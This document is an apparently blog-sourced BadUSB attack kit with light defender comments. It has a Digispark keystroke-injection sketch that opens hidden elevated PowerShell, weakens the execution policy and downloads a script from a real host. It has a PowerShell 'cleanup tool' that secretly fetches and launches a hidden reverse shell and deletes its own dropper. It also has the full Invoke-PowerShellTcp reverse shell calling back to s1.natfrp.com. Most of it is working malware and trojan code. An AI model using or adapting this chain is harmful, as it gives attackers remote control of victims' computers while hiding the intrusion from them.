badusb
源视频
烧录脚本
#include "DigiKeyboard.h"
// Keystroke-injection payload for a Digispark-style HID device; runs once
// when the board enumerates as a USB keyboard.
// Defender notes: the whole sequence is blind and timing-driven (fixed
// delay() calls, no feedback from the host), so it leaves the same trail
// whether or not it succeeds: a hidden powershell.exe, a UAC elevation from
// the SysWOW64 PowerShell path, an execution-policy change, and the file
// c:\forwen.ps1 fetched over plain HTTP from static.iswenzi.com.
void setup() {
pinMode(1, OUTPUT);
// A "no key" stroke first — presumably to let the host finish enumeration
// before real keys are typed (the library's usual idiom; verify).
DigiKeyboard.sendKeyStroke(0);
delay(3000);
// 57 is the raw HID usage id for Caps Lock (no named constant is used); it is
// sent again at the end of setup(), presumably to restore the original state.
DigiKeyboard.sendKeyStroke(57);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//WIN+R
delay(2000);
DigiKeyboard.sendKeyStroke(0);
delay(1000);
// Run dialog -> cmd -> PowerShell with a hidden window (-w hidden).
DigiKeyboard.println("cmd /c start powershell -w hidden");
delay(2000);
// Re-launches PowerShell elevated (-verb runas) from the 32-bit SysWOW64 path;
// on default UAC settings this raises a consent dialog.
DigiKeyboard.println("start-process -verb runas c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe");
delay(3000);
// ALT+Y then ENTER: intended to dismiss the UAC dialog blindly; the 3 s
// delay above is the only synchronisation the sketch has.
DigiKeyboard.sendKeyStroke(KEY_Y, MOD_ALT_LEFT);
delay(2000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
delay(3000);
// Persistently weakens the script execution policy; the "a" typed next
// presumably answers the confirmation prompt. The policy change survives the
// session and is a useful post-incident indicator (Get-ExecutionPolicy -List).
DigiKeyboard.println(F("set-executionpolicy remotesigned"));
delay(500);
DigiKeyboard.println("a");
delay(500);
// Stage-2 download via System.Net.WebClient (plain HTTP, no integrity check)
// to c:\forwen.ps1, then execution of that file. "$q" is typed literally and
// is a PowerShell variable on the host, not a C++ one.
DigiKeyboard.println("$q = new-object system.net.webclient");
delay(500);
DigiKeyboard.println("$q.downloadfile('http://static.iswenzi.com/forwen.ps1', 'c:\\forwen.ps1')");
delay(500);
DigiKeyboard.println("c:\\forwen.ps1");
delay(500);
// Second Caps Lock toggle (see above).
DigiKeyboard.sendKeyStroke(57);
}
// Status blink on pin 1 after setup() has finished: 100 ms high, 500 ms low,
// 100 ms high, then immediately back to the first high phase on the next
// iteration (so the two high phases run together).
void loop() {
  static const struct { int level; int ms; } pattern[] = {
    {HIGH, 100},
    {LOW, 500},
    {HIGH, 100},
  };
  for (unsigned step = 0; step < sizeof(pattern) / sizeof(pattern[0]); ++step) {
    digitalWrite(1, pattern[step].level);
    delay(pattern[step].ms);
  }
}
Powershell脚本
### Author: Rui Ma ###
### resize terminal size
# Console cosmetics for the menu UI: a 120x40 character window. Assigning the
# WindowSize property is the same call as Set_windowsize($win).
$rawUi = $Host.UI.RawUI
$dims = $rawUi.WindowSize
$dims.Width = 120
$dims.Height = 40
$rawUi.WindowSize = $dims
## functions
# calculate size
# Total size of everything under $dir (recursive), returned as a string with
# two decimals in MiB, e.g. "12.34". Directories are included in the listing
# but contribute no Length; access errors are reported by Get-ChildItem itself.
function get_size($dir){
  $totalBytes = (Get-ChildItem $dir -Recurse | Measure-Object -Property Length -Sum).Sum
  "{0:N2}" -f ($totalBytes / 1MB)
}
# delete cache
function clear_cache(){
# Wipes the user's %TEMP% and the Windows Update download cache. No -Force,
# so hidden/read-only items and files held open by other processes are
# generally left behind, each with its own error line — the warning printed
# below is the author's way of covering that. Mixed '\' and '/' separators
# are accepted by Remove-Item on Windows.
Remove-Item $env:TEMP/* -recurse
Remove-Item C:\Windows\SoftwareDistribution\Download/* -recurse
# Re-measure after the wipe; get_size returns a formatted MiB string.
$cache = get_size($env:TEMP)
Write-Output ""
Write-Host "Warning: Some files cannot be deleted temporarily because they are occupied by other applications."
Write-Host "After cleaning the system cache file size: "$cache "MB"
pause
}
# turn off system dormancy
# Disables hibernation via cmd.exe -> powercfg -h off (this is what frees the
# hibernation file on the system drive). The "5G to 20G" figure in the message
# is the author's estimate, not a measurement. Requires an elevated session.
function powercfg_off(){
  & 'C:\WINDOWS\System32\cmd.exe' /c powercfg -h off
  ''
  Write-Host "System dormancy has been closed, successfully releasing 5G to 20G space on disk C"
  ''
  pause
}
# turn on system dormancy
# Re-enables hibernation via cmd.exe -> powercfg -h on (counterpart of
# powercfg_off). Requires an elevated session.
function powercfg_on(){
  & 'C:\WINDOWS\System32\cmd.exe' /c powercfg -h on
  'System dormancy has been opened'
  pause
}
# open url
# Hands $url to the shell's default handler (normally the browser). Nothing is
# validated or downloaded here; the menu passes it plain-HTTP download links.
function open_url($url){
  Start-Process $url
}
# get content
# Fetches $url and emits the decoded response body; on any failure prints a
# fixed "NET ERROR..." to the host and emits nothing. In this file it serves
# both the remotely hosted menu text and the script body that is written to
# c:\system.ps1, so its output is attacker-controlled content either way.
function get_msm($url){
  try   { Invoke-RestMethod -Uri $url }
  catch { Write-Host "NET ERROR..." }
}
# choose
# Maps the language answer (1 = Chinese, anything else = English) to a menu
# URL on iswenzi.com. Note the function emits an empty string first, so a
# caller receives two objects (the original behaviour). Unused: the main
# script inlines this logic instead of calling it.
function lang_choose($lang_choose){
  ''
  if($lang_choose -eq 1){
    return "https://iswenzi.com/menu.php?lang=chinese"
  }
  "https://iswenzi.com/menu.php?lang=english"
}
# --- Covert stage, unrelated to the "cleanup tool" menu that follows ---
# 1) Download the Invoke-PowerShellTcp source from the author's server and
#    write it to c:\system.ps1 (the two commented-out lines would have marked
#    it hidden).
# 2) Start a second PowerShell — 32-bit SysWOW64 path, -WindowStyle Hidden,
#    -Verb RunAs (no extra UAC prompt if this session is already elevated) —
#    that imports the file and runs the reverse shell. It is a separate
#    process, so it outlives this script.
# IR indicators: c:\system.ps1 (the reverse shell deletes it itself once
# connected), a hidden powershell.exe from SYSWOW64 whose command line contains
# "Import-Module c:\system.ps1", and an outbound TCP connection from it.
$msm = get_msm("https://iswenzi.com/Invoke-PowerShellTcp.php")
Set-Content -Path c:\system.ps1 -Value $msm
#$file = Get-Item c:\system.ps1
#$file.Attributes="hidden"
START-PROCESS -VERB RUNAS C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE -WindowStyle Hidden "Import-Module c:\system.ps1;Invoke-PowerShellTcp"
## init
# Visible "initialization" banner for the cover story (version/author, time,
# current %TEMP% size).
cls;Write-Host "Version: v1.0";Write-Host "Author: Rui Ma";Write-Output "";Write-Output "The program is being initialized...";Write-Output ""
$begin_time = Get-Date;$cache = get_size($env:TEMP);
#Start-Sleep –s 2
# Anti-forensics: the first-stage file typed in by the USB device
# (c:\forwen.ps1) is deleted while this script is still running from memory,
# so after this point the dropper exists only in the running process.
rm C:\FORWEN.PS1
Write-Host "System time:"$begin_time;Write-Host "System cache size:"$cache "MB";Write-Output "";Write-Output "Initialization completed!"
Write-Output ""
# Language prompt; duplicates lang_choose() inline. Any answer other than 1
# selects the English menu URL.
$lang_choose = Read-Host "Language: 1.Chinese 2.English";if($lang_choose -eq 1){$lang_choosed = "https://iswenzi.com/menu.php?lang=chinese";}else{$lang_choosed = "https://iswenzi.com/menu.php?lang=english";}
# Main menu loop. The menu text is not in this file: every iteration
# re-downloads it from $lang_choosed (iswenzi.com, or ruiwencloud.xyz after
# option 101), so what the user sees is controlled remotely.
while(1){
cls;get_msm($lang_choosed) # menu
$choose = Read-Host "Select the function you need"
# Top-level options 2/3/4/7/8 only print a sub-menu; the user then types the
# two-digit code on the next pass through the loop.
switch($choose){
{$_ -eq 1}{clear_cache}
{$_ -eq 2}{cls;Write-Output "";Write-Host "21. Turn off system sleep (this function can be used if there is insufficient space on system disk C)";Write-Host "22. Turn on system sleep";pause}
{$_ -eq 21}{powercfg_off}
{$_ -eq 22}{powercfg_on}
{$_ -eq 3}{cls;Write-Output "";Write-Host "31. Task manager";Write-Host "32. Scheduled shutdown";Write-Host "33. Cancel the scheduled shutdown";pause}
{$_ -eq 31}{C:\WINDOWS\System32\Taskmgr.exe}
# 32 and 42 pass the typed value straight to shutdown.exe / taskkill.exe
# without validation; a non-numeric answer just makes the tool print its own
# usage error.
{$_ -eq 32}{$time_s = Read-Host "Please enter how many seconds to turn off the computer";C:\WINDOWS\System32\shutdown.exe -s -t $time_s}
{$_ -eq 33}{C:\WINDOWS\System32\shutdown.exe -a}
{$_ -eq 4}{cls;Write-Output "";Write-Host "41. List Tasks";Write-Host "42. Kill Task";pause}
{$_ -eq 41}{C:\Windows\System32\tasklist.exe;pause}
{$_ -eq 42}{$n_pid = Read-Host "Input the task PID";C:\Windows\System32\taskkill.exe /pid $n_pid /t;pause}
{$_ -eq 5}{Write-Host "No such command"}
# 71-83 open external downloads and sites in the browser. 71-73 are plain-HTTP
# executables/archives with no integrity check; 73 is described by the menu
# itself as a Windows activation tool.
{$_ -eq 7}{cls;Write-Output "";Write-Host "71. RWCloud.apk download";Write-Host "72. Access the Google plug-in of Chrome download";Write-Host "73. Windows digital activation tool download";Write-Host "74. iSlide tool download";pause}
{$_ -eq 71}{open_url("http://ruiwencloud.xyz/app/RWCloud.apk");}
{$_ -eq 72}{open_url("http://ruiwencloud.xyz/softwares/Chrome_Google.tar");}
{$_ -eq 73}{open_url("http://ruiwencloud.xyz/softwares/HWIDGen_v62.01_CHS.exe");}
{$_ -eq 74}{open_url("https://www.islide.cc/download");}
{$_ -eq 8}{cls;Write-Output "";Write-Host "81. Open Movie Website";Write-Host "82. Open Free Music Download Website";Write-Host "83. Programmed learning --JianShu"; pause}
{$_ -eq 81}{open_url("http://video.ruiwencloud.xyz")}
{$_ -eq 82}{open_url("https://music.sounm.com/")}
{$_ -eq 83}{open_url("https://www.jianshu.com/u/6cbbca425998")}
# 9 prints whatever the remote server returns at that URL.
{$_ -eq 9}{cls;get_msm("http://ruiwencloud.xyz/app/msm");pause}
# 100 ends only this visible tool; the hidden Invoke-PowerShellTcp process
# started earlier is a separate process and keeps running.
{$_ -eq 100}{exit}
# 101 re-points the menu to a different host (ruiwencloud.xyz) than the one
# chosen at startup (iswenzi.com).
{$_ -eq 101}{Write-Output "";$lang_choose = Read-Host "Language: 1.Chinese 2.English";if($lang_choose -eq 1){$lang_choosed = "http://ruiwencloud.xyz/app/msm/menu.php?lang=chinese";}else{$lang_choosed = "http://ruiwencloud.xyz/app/msm/menu.php?lang=english";}}
}# switch end
}# while end
Windows 反弹脚本
# Reverse TCP shell — the body that the main script downloads at runtime and
# writes to c:\system.ps1 (pasted here collapsed onto one line). What it does:
#  - opens a TCPClient to the hard-coded endpoint s1.natfrp.com:27455 (which
#    appears to be a tunnelling/relay host; the original LAN address and port
#    are left in comments),
#  - deletes C:\system.ps1 as soon as the connection is up (anti-forensics),
#  - sends "Windows PowerShell running as user <user> on <host>" plus a fake
#    "PS <path>>" prompt, then loops: reads up to 64 KiB from the socket, runs
#    it with Invoke-Expression, and writes the output, the last $error entry
#    and a new prompt back. Everything is plain ASCII, no TLS.
# Detection: outbound TCP from a hidden powershell.exe to an uncommon port,
# Invoke-Expression on socket-sourced text in script block logging (event
# 4104), and the literal banner string above on the wire.
# Note: $listener is never assigned in this variant, so the if ($listener)
# branch is dead code.
function Invoke-PowerShellTcp { try { #Connect back if the reverse switch is used. #$IPAddress = "10.215.64.73" #$Port = 666 $IPAddress = "s1.natfrp.com" $Port = 27455 $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) rm C:\system.ps1 $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} #Send back current username and computername $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") $stream.Write($sendbytes,0,$sendbytes.Length) #Show an interactive PowerShell prompt $sendbytes = ([text.encoding]::ASCII).GetBytes("PS " + (Get-Location).Path + ">") $stream.Write($sendbytes,0,$sendbytes.Length) while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding $data = $EncodedText.GetString($bytes,0, $i) #try{Write-Host "PS " (Get-Location).Path "> " $data}catch{Write-Host $data} try { #Execute the command on the target. $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) } catch { Write-Warning "Something went wrong with execution of command on the target." Write-Error $_ } $sendback2 = $sendback + "PS " + (Get-Location).Path + "> " $x = ($error[0] | Out-String) $error.clear() $sendback2 = $sendback2 + $x #Write-Host $sendback2 #Return the results $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close() if ($listener) { $listener.Stop() } } catch { Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." Write-Error $_ } }